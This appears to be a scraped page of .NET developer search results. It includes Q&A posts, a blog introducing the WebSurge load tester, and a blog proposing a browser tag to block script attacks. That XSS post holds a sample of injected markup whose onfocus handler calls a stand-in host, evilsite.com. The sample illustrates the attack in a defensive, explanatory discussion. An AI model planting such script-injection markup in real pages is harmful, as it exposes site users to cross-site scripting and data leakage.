Search Results

Search found 56102 results on 2245 pages for 'asp net mvc helpers'.

Page 573/2245 | < Previous Page | 569 570 571 572 573 574 575 576 577 578 579 580  | Next Page >

  • Parallel features in .Net 4.0

    - by Jonathan.Peppers
    I have been going over the practicality of some of the new parallel features in .Net 4.0. Say I have code like so: foreach (var item in myEnumerable) myDatabase.Insert(item.ConvertToDatabase()); Imagine myDatabase.Insert is performing some work to insert to a SQL database. Theoretically you could write: Parallel.ForEach(myEnumerable, item => myDatabase.Insert(item.ConvertToDatabase())); And automatically you get code that takes advantage of multiple cores. But what if myEnumerable can only be interacted with by a single thread? Will the Parallel class enumerate by a single thread and only dispatch the result to worker threads in the loop? What if myDatabase can only be interacted with by a single thread? It would certainly not be better to make a database connection per iteration of the loop. Finally, what if my "var item" happens to be a UserControl or something that must be interacted with on the UI thread? What design pattern should I follow to solve these problems? It's looking to me that switching over to Parallel/PLinq/etc is not exactly easy when you are dealing with real-world applications.

    Read the article

  • West Wind WebSurge - an easy way to Load Test Web Applications

    - by Rick Strahl
    A few months ago on a project the subject of load testing came up. We were having some serious issues with a Web application that would start spewing SQL lock errors under somewhat heavy load. These sort of errors can be tough to catch, precisely because they only occur under load and not during typical development testing. To replicate this error more reliably we needed to put a load on the application and run it for a while before these SQL errors would flare up. It’s been a while since I’d looked at load testing tools, so I spent a bit of time looking at different tools and frankly didn’t really find anything that was a good fit. A lot of tools were either a pain to use, didn’t have the basic features I needed, or are extravagantly expensive. In  the end I got frustrated enough to build an initially small custom load test solution that then morphed into a more generic library, then gained a console front end and eventually turned into a full blown Web load testing tool that is now called West Wind WebSurge. I got seriously frustrated looking for tools every time I needed some quick and dirty load testing for an application. If my aim is to just put an application under heavy enough load to find a scalability problem in code, or to simply try and push an application to its limits on the hardware it’s running I shouldn’t have to have to struggle to set up tests. It should be easy enough to get going in a few minutes, so that the testing can be set up quickly so that it can be done on a regular basis without a lot of hassle. And that was the goal when I started to build out my initial custom load tester into a more widely usable tool. If you’re in a hurry and you want to check it out, you can find more information and download links here: West Wind WebSurge Product Page Walk through Video Download link (zip) Install from Chocolatey Source on GitHub For a more detailed discussion of the why’s and how’s and some background continue reading. How did I get here? When I started out on this path, I wasn’t planning on building a tool like this myself – but I got frustrated enough looking at what’s out there to think that I can do better than what’s available for the most common simple load testing scenarios. When we ran into the SQL lock problems I mentioned, I started looking around what’s available for Web load testing solutions that would work for our whole team which consisted of a few developers and a couple of IT guys both of which needed to be able to run the tests. It had been a while since I looked at tools and I figured that by now there should be some good solutions out there, but as it turns out I didn’t really find anything that fit our relatively simple needs without costing an arm and a leg… I spent the better part of a day installing and trying various load testing tools and to be frank most of them were either terrible at what they do, incredibly unfriendly to use, used some terminology I couldn’t even parse, or were extremely expensive (and I mean in the ‘sell your liver’ range of expensive). Pick your poison. There are also a number of online solutions for load testing and they actually looked more promising, but those wouldn’t work well for our scenario as the application is running inside of a private VPN with no outside access into the VPN. Most of those online solutions also ended up being very pricey as well – presumably because of the bandwidth required to test over the open Web can be enormous. When I asked around on Twitter what people were using– I got mostly… crickets. Several people mentioned Visual Studio Load Test, and most other suggestions pointed to online solutions. I did get a bunch of responses though with people asking to let them know what I found – apparently I’m not alone when it comes to finding load testing tools that are effective and easy to use. As to Visual Studio, the higher end skus of Visual Studio and the test edition include a Web load testing tool, which is quite powerful, but there are a number of issues with that: First it’s tied to Visual Studio so it’s not very portable – you need a VS install. I also find the test setup and terminology used by the VS test runner extremely confusing. Heck, it’s complicated enough that there’s even a Pluralsight course on using the Visual Studio Web test from Steve Smith. And of course you need to have one of the high end Visual Studio Skus, and those are mucho Dinero ($$$) – just for the load testing that’s rarely an option. Some of the tools are ultra extensive and let you run analysis tools on the target serves which is useful, but in most cases – just plain overkill and only distracts from what I tend to be ultimately interested in: Reproducing problems that occur at high load, and finding the upper limits and ‘what if’ scenarios as load is ramped up increasingly against a site. Yes it’s useful to have Web app instrumentation, but often that’s not what you’re interested in. I still fondly remember early days of Web testing when Microsoft had the WAST (Web Application Stress Tool) tool, which was rather simple – and also somewhat limited – but easily allowed you to create stress tests very quickly. It had some serious limitations (mainly that it didn’t work with SSL),  but the idea behind it was excellent: Create tests quickly and easily and provide a decent engine to run it locally with minimal setup. You could get set up and run tests within a few minutes. Unfortunately, that tool died a quiet death as so many of Microsoft’s tools that probably were built by an intern and then abandoned, even though there was a lot of potential and it was actually fairly widely used. Eventually the tools was no longer downloadable and now it simply doesn’t work anymore on higher end hardware. West Wind Web Surge – Making Load Testing Quick and Easy So I ended up creating West Wind WebSurge out of rebellious frustration… The goal of WebSurge is to make it drop dead simple to create load tests. It’s super easy to capture sessions either using the built in capture tool (big props to Eric Lawrence, Telerik and FiddlerCore which made that piece a snap), using the full version of Fiddler and exporting sessions, or by manually or programmatically creating text files based on plain HTTP headers to create requests. I’ve been using this tool for 4 months now on a regular basis on various projects as a reality check for performance and scalability and it’s worked extremely well for finding small performance issues. I also use it regularly as a simple URL tester, as it allows me to quickly enter a URL plus headers and content and test that URL and its results along with the ability to easily save one or more of those URLs. A few weeks back I made a walk through video that goes over most of the features of WebSurge in some detail: Note that the UI has slightly changed since then, so there are some UI improvements. Most notably the test results screen has been updated recently to a different layout and to provide more information about each URL in a session at a glance. The video and the main WebSurge site has a lot of info of basic operations. For the rest of this post I’ll talk about a few deeper aspects that may be of interest while also giving a glance at how WebSurge works. Session Capturing As you would expect, WebSurge works with Sessions of Urls that are played back under load. Here’s what the main Session View looks like: You can create session entries manually by individually adding URLs to test (on the Request tab on the right) and saving them, or you can capture output from Web Browsers, Windows Desktop applications that call services, your own applications using the built in Capture tool. With this tool you can capture anything HTTP -SSL requests and content from Web pages, AJAX calls, SOAP or REST services – again anything that uses Windows or .NET HTTP APIs. Behind the scenes the capture tool uses FiddlerCore so basically anything you can capture with Fiddler you can also capture with Web Surge Session capture tool. Alternately you can actually use Fiddler as well, and then export the captured Fiddler trace to a file, which can then be imported into WebSurge. This is a nice way to let somebody capture session without having to actually install WebSurge or for your customers to provide an exact playback scenario for a given set of URLs that cause a problem perhaps. Note that not all applications work with Fiddler’s proxy unless you configure a proxy. For example, .NET Web applications that make HTTP calls usually don’t show up in Fiddler by default. For those .NET applications you can explicitly override proxy settings to capture those requests to service calls. The capture tool also has handy optional filters that allow you to filter by domain, to help block out noise that you typically don’t want to include in your requests. For example, if your pages include links to CDNs, or Google Analytics or social links you typically don’t want to include those in your load test, so by capturing just from a specific domain you are guaranteed content from only that one domain. Additionally you can provide url filters in the configuration file – filters allow to provide filter strings that if contained in a url will cause requests to be ignored. Again this is useful if you don’t filter by domain but you want to filter out things like static image, css and script files etc. Often you’re not interested in the load characteristics of these static and usually cached resources as they just add noise to tests and often skew the overall url performance results. In my testing I tend to care only about my dynamic requests. SSL Captures require Fiddler Note, that in order to capture SSL requests you’ll have to install the Fiddler’s SSL certificate. The easiest way to do this is to install Fiddler and use its SSL configuration options to get the certificate into the local certificate store. There’s a document on the Telerik site that provides the exact steps to get SSL captures to work with Fiddler and therefore with WebSurge. Session Storage A group of URLs entered or captured make up a Session. Sessions can be saved and restored easily as they use a very simple text format that simply stored on disk. The format is slightly customized HTTP header traces separated by a separator line. The headers are standard HTTP headers except that the full URL instead of just the domain relative path is stored as part of the 1st HTTP header line for easier parsing. Because it’s just text and uses the same format that Fiddler uses for exports, it’s super easy to create Sessions by hand manually or under program control writing out to a simple text file. You can see what this format looks like in the Capture window figure above – the raw captured format is also what’s stored to disk and what WebSurge parses from. The only ‘custom’ part of these headers is that 1st line contains the full URL instead of the domain relative path and Host: header. The rest of each header are just plain standard HTTP headers with each individual URL isolated by a separator line. The format used here also uses what Fiddler produces for exports, so it’s easy to exchange or view data either in Fiddler or WebSurge. Urls can also be edited interactively so you can modify the headers easily as well: Again – it’s just plain HTTP headers so anything you can do with HTTP can be added here. Use it for single URL Testing Incidentally I’ve also found this form as an excellent way to test and replay individual URLs for simple non-load testing purposes. Because you can capture a single or many URLs and store them on disk, this also provides a nice HTTP playground where you can record URLs with their headers, and fire them one at a time or as a session and see results immediately. It’s actually an easy way for REST presentations and I find the simple UI flow actually easier than using Fiddler natively. Finally you can save one or more URLs as a session for later retrieval. I’m using this more and more for simple URL checks. Overriding Cookies and Domains Speaking of HTTP headers – you can also overwrite cookies used as part of the options. One thing that happens with modern Web applications is that you have session cookies in use for authorization. These cookies tend to expire at some point which would invalidate a test. Using the Options dialog you can actually override the cookie: which replaces the cookie for all requests with the cookie value specified here. You can capture a valid cookie from a manual HTTP request in your browser and then paste into the cookie field, to replace the existing Cookie with the new one that is now valid. Likewise you can easily replace the domain so if you captured urls on west-wind.com and now you want to test on localhost you can do that easily easily as well. You could even do something like capture on store.west-wind.com and then test on localhost/store which would also work. Running Load Tests Once you’ve created a Session you can specify the length of the test in seconds, and specify the number of simultaneous threads to run each session on. Sessions run through each of the URLs in the session sequentially by default. One option in the options list above is that you can also randomize the URLs so each thread runs requests in a different order. This avoids bunching up URLs initially when tests start as all threads run the same requests simultaneously which can sometimes skew the results of the first few minutes of a test. While sessions run some progress information is displayed: By default there’s a live view of requests displayed in a Console-like window. On the bottom of the window there’s a running total summary that displays where you’re at in the test, how many requests have been processed and what the requests per second count is currently for all requests. Note that for tests that run over a thousand requests a second it’s a good idea to turn off the console display. While the console display is nice to see that something is happening and also gives you slight idea what’s happening with actual requests, once a lot of requests are processed, this UI updating actually adds a lot of CPU overhead to the application which may cause the actual load generated to be reduced. If you are running a 1000 requests a second there’s not much to see anyway as requests roll by way too fast to see individual lines anyway. If you look on the options panel, there is a NoProgressEvents option that disables the console display. Note that the summary display is still updated approximately once a second so you can always tell that the test is still running. Test Results When the test is done you get a simple Results display: On the right you get an overall summary as well as breakdown by each URL in the session. Both success and failures are highlighted so it’s easy to see what’s breaking in your load test. The report can be printed or you can also open the HTML document in your default Web Browser for printing to PDF or saving the HTML document to disk. The list on the right shows you a partial list of the URLs that were fired so you can look in detail at the request and response data. The list can be filtered by success and failure requests. Each list is partial only (at the moment) and limited to a max of 1000 items in order to render reasonably quickly. Each item in the list can be clicked to see the full request and response data: This particularly useful for errors so you can quickly see and copy what request data was used and in the case of a GET request you can also just click the link to quickly jump to the page. For non-GET requests you can find the URL in the Session list, and use the context menu to Test the URL as configured including any HTTP content data to send. You get to see the full HTTP request and response as well as a link in the Request header to go visit the actual page. Not so useful for a POST as above, but definitely useful for GET requests. Finally you can also get a few charts. The most useful one is probably the Request per Second chart which can be accessed from the Charts menu or shortcut. Here’s what it looks like:   Results can also be exported to JSON, XML and HTML. Keep in mind that these files can get very large rather quickly though, so exports can end up taking a while to complete. Command Line Interface WebSurge runs with a small core load engine and this engine is plugged into the front end application I’ve shown so far. There’s also a command line interface available to run WebSurge from the Windows command prompt. Using the command line you can run tests for either an individual URL (similar to AB.exe for example) or a full Session file. By default when it runs WebSurgeCli shows progress every second showing total request count, failures and the requests per second for the entire test. A silent option can turn off this progress display and display only the results. The command line interface can be useful for build integration which allows checking for failures perhaps or hitting a specific requests per second count etc. It’s also nice to use this as quick and dirty URL test facility similar to the way you’d use Apache Bench (ab.exe). Unlike ab.exe though, WebSurgeCli supports SSL and makes it much easier to create multi-URL tests using either manual editing or the WebSurge UI. Current Status Currently West Wind WebSurge is still in Beta status. I’m still adding small new features and tweaking the UI in an attempt to make it as easy and self-explanatory as possible to run. Documentation for the UI and specialty features is also still a work in progress. I plan on open-sourcing this product, but it won’t be free. There’s a free version available that provides a limited number of threads and request URLs to run. A relatively low cost license  removes the thread and request limitations. Pricing info can be found on the Web site – there’s an introductory price which is $99 at the moment which I think is reasonable compared to most other for pay solutions out there that are exorbitant by comparison… The reason code is not available yet is – well, the UI portion of the app is a bit embarrassing in its current monolithic state. The UI started as a very simple interface originally that later got a lot more complex – yeah, that never happens, right? Unless there’s a lot of interest I don’t foresee re-writing the UI entirely (which would be ideal), but in the meantime at least some cleanup is required before I dare to publish it :-). The code will likely be released with version 1.0. I’m very interested in feedback. Do you think this could be useful to you and provide value over other tools you may or may not have used before? I hope so – it already has provided a ton of value for me and the work I do that made the development worthwhile at this point. You can leave a comment below, or for more extensive discussions you can post a message on the West Wind Message Board in the WebSurge section Microsoft MVPs and Insiders get a free License If you’re a Microsoft MVP or a Microsoft Insider you can get a full license for free. Send me a link to your current, official Microsoft profile and I’ll send you a not-for resale license. Send any messages to [email protected]. Resources For more info on WebSurge and to download it to try it out, use the following links. West Wind WebSurge Home Download West Wind WebSurge Getting Started with West Wind WebSurge Video© Rick Strahl, West Wind Technologies, 2005-2014Posted in ASP.NET   Tweet !function(d,s,id){var js,fjs=d.getElementsByTagName(s)[0];if(!d.getElementById(id)){js=d.createElement(s);js.id=id;js.src="//platform.twitter.com/widgets.js";fjs.parentNode.insertBefore(js,fjs);}}(document,"script","twitter-wjs"); (function() { var po = document.createElement('script'); po.type = 'text/javascript'; po.async = true; po.src = 'https://apis.google.com/js/plusone.js'; var s = document.getElementsByTagName('script')[0]; s.parentNode.insertBefore(po, s); })();

    Read the article

  • Wishful Thinking: Why can't HTML fix Script Attacks at the Source?

    - by Rick Strahl
    The Web can be an evil place, especially if you're a Web Developer blissfully unaware of Cross Site Script Attacks (XSS). Even if you are aware of XSS in all of its insidious forms, it's extremely complex to deal with all the issues if you're taking user input and you're actually allowing users to post raw HTML into an application. I'm dealing with this again today in a Web application where legacy data contains raw HTML that has to be displayed and users ask for the ability to use raw HTML as input for listings. The first line of defense of course is: Just say no to HTML input from users. If you don't allow HTML input directly and use HTML Encoding (HttyUtility.HtmlEncode() in .NET or using standard ASP.NET MVC output @Model.Content) you're fairly safe at least from the HTML input provided. Both WebForms and Razor support HtmlEncoded content, although Razor makes it the default. In Razor the default @ expression syntax:@Model.UserContent automatically produces HTML encoded content - you actually have to go out of your way to create raw HTML content (safe by default) using @Html.Raw() or the HtmlString class. In Web Forms (V4) you can use:<%: Model.UserContent %> or if you're using a version prior to 4.0:<%= HttpUtility.HtmlEncode(Model.UserContent) %> This works great as a hedge against embedded <script> tags and HTML markup as any HTML is turned into text that displays as HTML but doesn't render the HTML. But it turns any embedded HTML markup tags into plain text. If you need to display HTML in raw form with the markup tags rendering based on user input this approach is worthless. If you do accept HTML input and need to echo the rendered HTML input back, the task of cleaning up that HTML is a complex task. In the projects I work on, customers are frequently asking for the ability to post raw HTML quite frequently.  Almost every app that I've built where there's document content from users we start out with text only input - possibly using something like MarkDown - but inevitably users want to just post plain old HTML they created in some other rich editing application. See this a lot with realtors especially who often want to reuse their postings easily in multiple places. In my work this is a common problem I need to deal with and I've tried dozens of different methods from sanitizing, simple rejection of input to custom markup schemes none of which have ever felt comfortable to me. They work in a half assed, hacked together sort of way but I always live in fear of missing something vital which is *really easy to do*. My Wishlist Item: A <restricted> tag in HTML Let me dream here for a second on how to address this problem. It seems to me the easiest place where this can be fixed is: In the browser. Browsers are actually executing script code so they have a lot of control over the script code that resides in a page. What if there was a way to specify that you want to turn off script code for a block of HTML? The main issue when dealing with HTML raw input isn't that we as developers are unaware of the implications of user input, but the fact that we sometimes have to display raw HTML input the user provides. So the problem markup is usually isolated in only a very specific part of the document. So, what if we had a way to specify that in any given HTML block, no script code could execute by wrapping it into a tag that disables all script functionality in the browser? This would include <script> tags and any document script attributes like onclick, onfocus etc. and potentially also disallow things like iFrames that can potentially be scripted from the within the iFrame's target. I'd like to see something along these lines:<article> <restricted allowscripts="no" allowiframes="no"> <div>Some content</div> <script>alert('go ahead make my day, punk!");</script> <div onfocus="$.getJson('http://evilsite.com/')">more content</div> </restricted> </article> A tag like this would basically disallow all script code from firing from any HTML that's rendered within it. You'd use this only on code that you actually render from your data only and only if you are dealing with custom data. So something like this:<article> <restricted> @Html.Raw(Model.UserContent) </restricted> </article> For browsers this would actually be easy to intercept. They render the DOM and control loading and execution of scripts that are loaded through it. All the browser would have to do is suspend execution of <script> tags and not hookup any event handlers defined via markup in this block. Given all the crazy XSS attacks that exist and the prevalence of this problem this would go a long way towards preventing at least coded script attacks in the DOM. And it seems like a totally doable solution that wouldn't be very difficult to implement by vendors. There would also need to be some logic in the parser to not allow an </restricted> or <restricted> tag into the content as to short-circuit the rstricted section (per James Hart's comment). I'm sure there are other issues to consider as well that I didn't think of in my off-the-back-of-a-napkin concept here but the idea overall seems worth consideration I think. Without code running in a user supplied HTML block it'd be pretty hard to compromise a local HTML document and pass information like Cookies to a server. Or even send data to a server period. Short of an iFrame that can access the parent frame (which is another restriction that should be available on this <restricted> tag) that could potentially communicate back, there's not a lot a malicious site could do. The HTML could still 'phone home' via image links and href links potentially and basically say this site was accessed, but without the ability to run script code it would be pretty tough to pass along critical information to the server beyond that. Ahhhh… one can dream… Not holding my breath of course. The design by committee that is the W3C can't agree on anything in timeframes measured less than decades, but maybe this is one place where browser vendors can actually step up the pressure. This is something in their best interest to reduce the attack surface for vulnerabilities on their browser platforms significantly. Several people commented on Twitter today that there isn't enough discussion on issues like this that address serious needs in the web browser space. Realistically security has to be a number one concern with Web applications in general - there isn't a Web app out there that is not vulnerable. And yet nothing has been done to address these security issues even though there might be relatively easy solutions to make this happen. It'll take time, and it's probably not going to happen in our lifetime, but maybe this rambling thought sparks some ideas on how this sort of restriction can get into browsers in some way in the future.© Rick Strahl, West Wind Technologies, 2005-2012Posted in ASP.NET  HTML5  HTML  Security   Tweet !function(d,s,id){var js,fjs=d.getElementsByTagName(s)[0];if(!d.getElementById(id)){js=d.createElement(s);js.id=id;js.src="//platform.twitter.com/widgets.js";fjs.parentNode.insertBefore(js,fjs);}}(document,"script","twitter-wjs"); (function() { var po = document.createElement('script'); po.type = 'text/javascript'; po.async = true; po.src = 'https://apis.google.com/js/plusone.js'; var s = document.getElementsByTagName('script')[0]; s.parentNode.insertBefore(po, s); })();

    Read the article

  • A first look at SignalR

    - by Rick Strahl
    Last month I finally had a chance to use SignalR in a live project for the first time, and I've been impressed by what this technology offers to .NET developers. It's easy to use and provides rich real-time two way messaging between client and server applications, as well as the ability to broadcast message to all connected clients. This is technology that offers many opportunities to rethink of what we can build with Web applications.

    Read the article

  • Development Quirk From ASP.NET Dynamic Compilation

    - by jkauffman
    The Problem I got a compilation error in my ASP.NET MVC3 project that tested my sanity today. (As always, names are changed to protect the innocent) The type or namespace name 'FishViewModel' does not exist in the namespace 'Company.Product.Application.Models' (are you missing an assembly reference?) Sure looks easy! There must be something in the project referring to a FishViewModel. The Confusing Part The first thing I noticed was the that error was occuring in a folder clearly not in my project and in files that I definitely had not created: %SystemRoot%\Microsoft.NET\Framework\(versionNumber)\Temporary ASP.NET Files\ App_Web_mezpfjae.1.cs I also ascertained these facts, each of which made me more confused than the last: Rebuild and Clean had no effect. No controllers in the project ever returned a ViewResult using FishViewModel. No views in the project defined that they use FishViewModel. Searching across all files included in the project for “FishViewModel” provided no results. The build server did not report a problem. The Solution The problem stemmed from a file that was not included in the project but still present on the file system: (By the way, if you don’t know this trick already, there is a toolbar button in the Solution Explorer window to “Show All Files” which allows you to see files all files in the file system) In my situation, I was working on the mission-critical Fish view before abandoning the feature. Instead of deleting the file, I excluded it from the project. However, this was a bad move. It caused the build failure, and in order to fix the error, this file must be deleted. By the way, this file was not in source control, so the build server did not have it. This explains why my build server did not report a problem for me. The Explanation So, what’s going on? This file isn’t even a part of the project, so why is it failing the build? This is a behavior of the ASP.NET Dynamic Compilation. This is the same process that occurs when deploying a webpage; ASP.NET compiles the web application’s code. When this occurs on a production server, it has to do so without the .csproj file (which isn’t usually deployed, if you’ve taken your time to do a deployment cleanly). This process has merely the file system available to identify what to compile. So, back in the world of developing the webpage in visual studio on my developer box, I run into the situation because the same process is occuring there. This is true even though I have more files on my machine than will actually get deployed. I can’t help but think that this error could be attributed back to the real culprit file (Fish.cshtml, rather than the temporary files) with some work, but at least the error had enough information in it to narrow it down. The Conclusion I had previously been accustomed to the idea that for c# projects, the .csproj file always “defines” the build behavior. This investigation has taught me that I’ll need to shift my thinking a bit to remember that the file system has the final say when it comes to web applications, even on the developer’s machine!

    Read the article

  • Generic HTTP 500 Error Message On Hosted Sites (like GoDaddy)

    - by Jimbo
    I decided to post this because I battled to find out how to do it and couldnt see anything on Stackoverflow about it. Often when you host with a provider like GoDaddy, they have "Custom Error Messages" set to ON. What I didnt realise was that the web.config settings dont just apply to ASP.NET, they apply to all applications on YOUR IIS site and hence will sort this problem out for Classic ASP as well (very few GoDaddy support people even know this) All you need to do is add the following to your web.config OR, for those using Classic ASP, just create a web.config file in your ROOT with this code in it. <configuration> <system.webServer> <asp scriptErrorSentToBrowser="true"/> <httpErrors errorMode="Detailed"/> </system.webServer> </configuration>

    Read the article

  • IIS7 - how to place application in a folder inside application web site

    - by Nir
    I have a static web site with a blog (an asp.net application), the blog is in a subdirectory of the web site so: example.com/, example.com/Something.htm, example.com/folder/somefile.htm, etc. - are all static files example.com/blog, example.com/blog/categories.aspx, example.com/blog/2011/11/09/post-name.aspx, etc. - all go to the blog app I'm upgrading the static part of the web site to a dynamic site (also an asp.net application) and the blog is incompatible with the new app (the app needs handlers and modules loaded in web.config that don't work with the blog) Also, I have to keep all the old URLs the same - so I can't move the blog to a subdomain or the new app to a folder and the blog generates links based on its folder so clever redirection tricks wouldn't work. Is there a way to place an asp.net application in a folder inside another application (either as a real or virtual folder) so that the root web.config settings don't apply to the application folder? Or some other trick I didn't think of? The system is running IIS7 on Windows Server 2008 64bit, I have full control over the server's configuration. I can't modify the blog's source code but I can edit its web.config and other configuration. I can modify the source of the new application but I can't make it compatible with the blog (most of its usefulness comes from a 3rd party library that is not compatible with the blog). The blog in an asp.net 3.5 webforms application The new root application is an asp.net 4.0 mvc application

    Read the article

  • Troubleshooting intermittantly long 'page loading' problem

    - by justSteve
    Working off IIS 7 with an asp.net mvc app. Most page accesses are lightening quick. Sometimes the browser reports 'page loading' for an exceptionally long time. We are still in the development/testing mode so it's not a network/bandwidth issue. Happens in both IE and FF. No explicit error conditions in the server logs. If i could reproduce it i could run firebug/fiddler to give more info. As it is, it's a little too infrequent to simply leave both those running hoping for the condition to fire - unless/until that's the only option to get better info. I have a hunch this is client-side jquery/ajax related but only a hunch - don't have enough background in either jQuery or MVC to really know what can go wrong. Any initial troubleshooting suggestions welcome. thx

    Read the article

  • Apache ProxyPass/ProxyPassReverse to IIS

    - by Dana
    We have an ASP.NET web application which is mapped to a folder on an apache hosted php site using ProxyPass.ProxyPassReverse. A couple of problems being encountered. cookies are being lost which breaks the site navigation, this can be overcome by setting the asp app as cookieless. Forms authentication is used on the ASP site, this is also broken withe the proxypass in place, suspect this is cookie related also. ASP site works ok when run from a domain/ip address. Use of a separate domain / sub-domain is not an option duew to client requirements.

    Read the article

  • Running .NET app from network share in Win 7?

    - by mlangille
    We have a .NET 1.1 application that we keep on a netowork share. We install the .NET Framerwork to the local PCs and also set the full trust via the following: %windir%\Microsoft.NET\Framework\v1.1.4322\caspol -pp off -cg LocalIntranet_Zone FullTrust This has worked fine on all PCs to date however now we have a few new PCs with Win7 and the process no longer is working. The app will run fine from a local drive in Win7 but running the networked copy results in a general exception error. Any ideas on how to get this to work under Win7?

    Read the article

  • Apache ProxyPass/ProxyPassReverse to IIS

    - by Dana
    We have an ASP.NET web application which is mapped to a folder on an apache hosted php site using ProxyPass.ProxyPassReverse. A couple of problems being encountered. cookies are being lost which breaks the site navigation, this can be overcome by setting the asp app as cookieless. Forms authentication is used on the ASP site, this is also broken withe the proxypass in place, suspect this is cookie related also. ASP site works ok when run from a domain/ip address. Use of a separate domain / sub-domain is not an option duew to client requirements.

    Read the article

  • Does my OS will support these tools ?

    - by Zerotoinfinite
    I am currently using Windows Server 2003 and I want to install Windows XP [SP1 or SP2 or SP3] or may be VISTA. I have may application which I can run on Windows Server 2003 and I am curious to know If I could run the same on XP or Vista. Please help me deciding whether I change my OS or not, here is the List of software and app I want to work on: Visual Studio 2008/2010 SQL Server 2008 ASP.NET MVC and Entity Framework WPF application P.S. : I can create all my application [except WPF] with Windows Server 2003. I have a idea that I can install VS 2008 on XP but not exactly sure about MVC framework and other latest technology stuff.

    Read the article

  • What data should I (can I) gather to prove a .net bug in third party software?

    - by gef05
    Our users are using a third-party system and every so often - a user might go all day without this happening, other days they may see it two or three times in seven hours - a red x will appear on screen rather than a button, field, or control. This is a .net system. Looking online I can see that this is a .net error. Problem is, our devs didn't write it, and the vendor wants proof that the problem resides with their system, not our PCs. What can we do to gather information on such an issue that would allow us to make our case to the vendor and get them to create a fix? I'm thinking of data to gather - anything from OS, memory. .net version installed etc. But I'd also like to know about error logging - if it's possible to log errors that occur in third-party systems.

    Read the article

  • Deserializing JSON data to C# using JSON.NET

    - by Derek Utah
    I'm relatively new to working with C# and JSON data and am seeking guidance. I'm using C# 3.0, with .NET3.5SP1, and JSON.NET 3.5r6. I have a defined C# class that I need to populate from a JSON structure. However, not every JSON structure for an entry that is retrieved from the web service contains all possible attributes that are defined within the C# class. I've been being doing what seems to be the wrong, hard way and just picking out each value one by one from the JObject and transforming the string into the desired class property. JsonSerializer serializer = new JsonSerializer(); var o = (JObject)serializer.Deserialize(myjsondata); MyAccount.EmployeeID = (string)o["employeeid"][0]; What is the best way to deserialize a JSON structure into the C# class and handling possible missing data from the JSON source? My class is defined as: public class MyAccount { [JsonProperty(PropertyName = "username")] public string UserID { get; set; } [JsonProperty(PropertyName = "givenname")] public string GivenName { get; set; } [JsonProperty(PropertyName = "sn")] public string Surname { get; set; } [JsonProperty(PropertyName = "passwordexpired")] public DateTime PasswordExpire { get; set; } [JsonProperty(PropertyName = "primaryaffiliation")] public string PrimaryAffiliation { get; set; } [JsonProperty(PropertyName = "affiliation")] public string[] Affiliation { get; set; } [JsonProperty(PropertyName = "affiliationstatus")] public string AffiliationStatus { get; set; } [JsonProperty(PropertyName = "affiliationmodifytimestamp")] public DateTime AffiliationLastModified { get; set; } [JsonProperty(PropertyName = "employeeid")] public string EmployeeID { get; set; } [JsonProperty(PropertyName = "accountstatus")] public string AccountStatus { get; set; } [JsonProperty(PropertyName = "accountstatusexpiration")] public DateTime AccountStatusExpiration { get; set; } [JsonProperty(PropertyName = "accountstatusexpmaxdate")] public DateTime AccountStatusExpirationMaxDate { get; set; } [JsonProperty(PropertyName = "accountstatusmodifytimestamp")] public DateTime AccountStatusModified { get; set; } [JsonProperty(PropertyName = "accountstatusexpnotice")] public string AccountStatusExpNotice { get; set; } [JsonProperty(PropertyName = "accountstatusmodifiedby")] public Dictionary<DateTime, string> AccountStatusModifiedBy { get; set; } [JsonProperty(PropertyName = "entrycreatedate")] public DateTime EntryCreatedate { get; set; } [JsonProperty(PropertyName = "entrydeactivationdate")] public DateTime EntryDeactivationDate { get; set; } } And a sample of the JSON to parse is: { "givenname": [ "Robert" ], "passwordexpired": "20091031041550Z", "accountstatus": [ "active" ], "accountstatusexpiration": [ "20100612000000Z" ], "accountstatusexpmaxdate": [ "20110410000000Z" ], "accountstatusmodifiedby": { "20100214173242Z": "tdecker", "20100304003242Z": "jsmith", "20100324103242Z": "jsmith", "20100325000005Z": "rjones", "20100326210634Z": "jsmith", "20100326211130Z": "jsmith" }, "accountstatusmodifytimestamp": [ "20100312001213Z" ], "affiliation": [ "Employee", "Contractor", "Staff" ], "affiliationmodifytimestamp": [ "20100312001213Z" ], "affiliationstatus": [ "detached" ], "entrycreatedate": [ "20000922072747Z" ], "username": [ "rjohnson" ], "primaryaffiliation": [ "Staff" ], "employeeid": [ "999777666" ], "sn": [ "Johnson" ] }

    Read the article

  • Twitter bootstrap + asp.net masterpages, how to set navbar item as active when user selects it?

    - by ase69s
    We are in se same situation as question Make Twitter Bootstrap navbar link active, but in our case we are using ASP.net and MasterPages... The thing is the navbar is defined at the masterpage and when you click a menuitem you are redirected to the corresponding child page so how would you do to change the navbar active item consecuently without replicating the logic in each child page? (Preferably without session variables and javascript only at master page)

    Read the article

  • ADO.NET Data Services Entity Framework request error when property setter is internal

    - by Jim Straatman
    I receive an error message when exposing an ADO.NET Data Service using an Entity Framework data model that contains an entity (called "Case") with an internal setter on a property. If I modify the setter to be public (using the entity designer), the data services works fine. I don’t need the entity "Case" exposed in the data service, so I tried to limit which entities are exposed using SetEntitySetAccessRule. This didn’t work, and service end point fails with the same error. public static void InitializeService(IDataServiceConfiguration config) { config.SetEntitySetAccessRule("User", EntitySetRights.AllRead); } The error message is reported in a browser when the .svc endpoint is called. It is very generic, and reads “Request Error. The server encountered an error processing the request. See server logs for more details.” Unfortunately, there are no entries in the System and Application event logs. I found this stackoverflow question that shows how to configure tracing on the service. After doing so, the following NullReferenceExceptoin error was reported in the trace log. Does anyone know how to avoid this exception when including an entity with an internal setter? Blockquote 131076 3 0 2 MOTOJIM http://msdn.microsoft.com/en-US/library/System.ServiceModel.Diagnostics.TraceHandledException.aspx Handling an exception. 685a2910-19-128703978432492675 System.NullReferenceException, mscorlib, Version=2.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089 Object reference not set to an instance of an object. at System.Data.Services.Providers.ObjectContextServiceProvider.PopulateMemberMetadata(ResourceType resourceType, MetadataWorkspace workspace, IDictionary2 entitySets, IDictionary2 knownTypes) at System.Data.Services.Providers.ObjectContextServiceProvider.PopulateMetadata(IDictionary2 knownTypes, IDictionary2 entitySets) at System.Data.Services.Providers.BaseServiceProvider.PopulateMetadata() at System.Data.Services.DataService1.CreateProvider(Type dataServiceType, Object dataSourceInstance, DataServiceConfiguration&amp; configuration) at System.Data.Services.DataService1.EnsureProviderAndConfigForRequest() at System.Data.Services.DataService1.ProcessRequestForMessage(Stream messageBody) at SyncInvokeProcessRequestForMessage(Object , Object[] , Object[] ) at System.ServiceModel.Dispatcher.SyncMethodInvoker.Invoke(Object instance, Object[] inputs, Object[]&amp; outputs) at 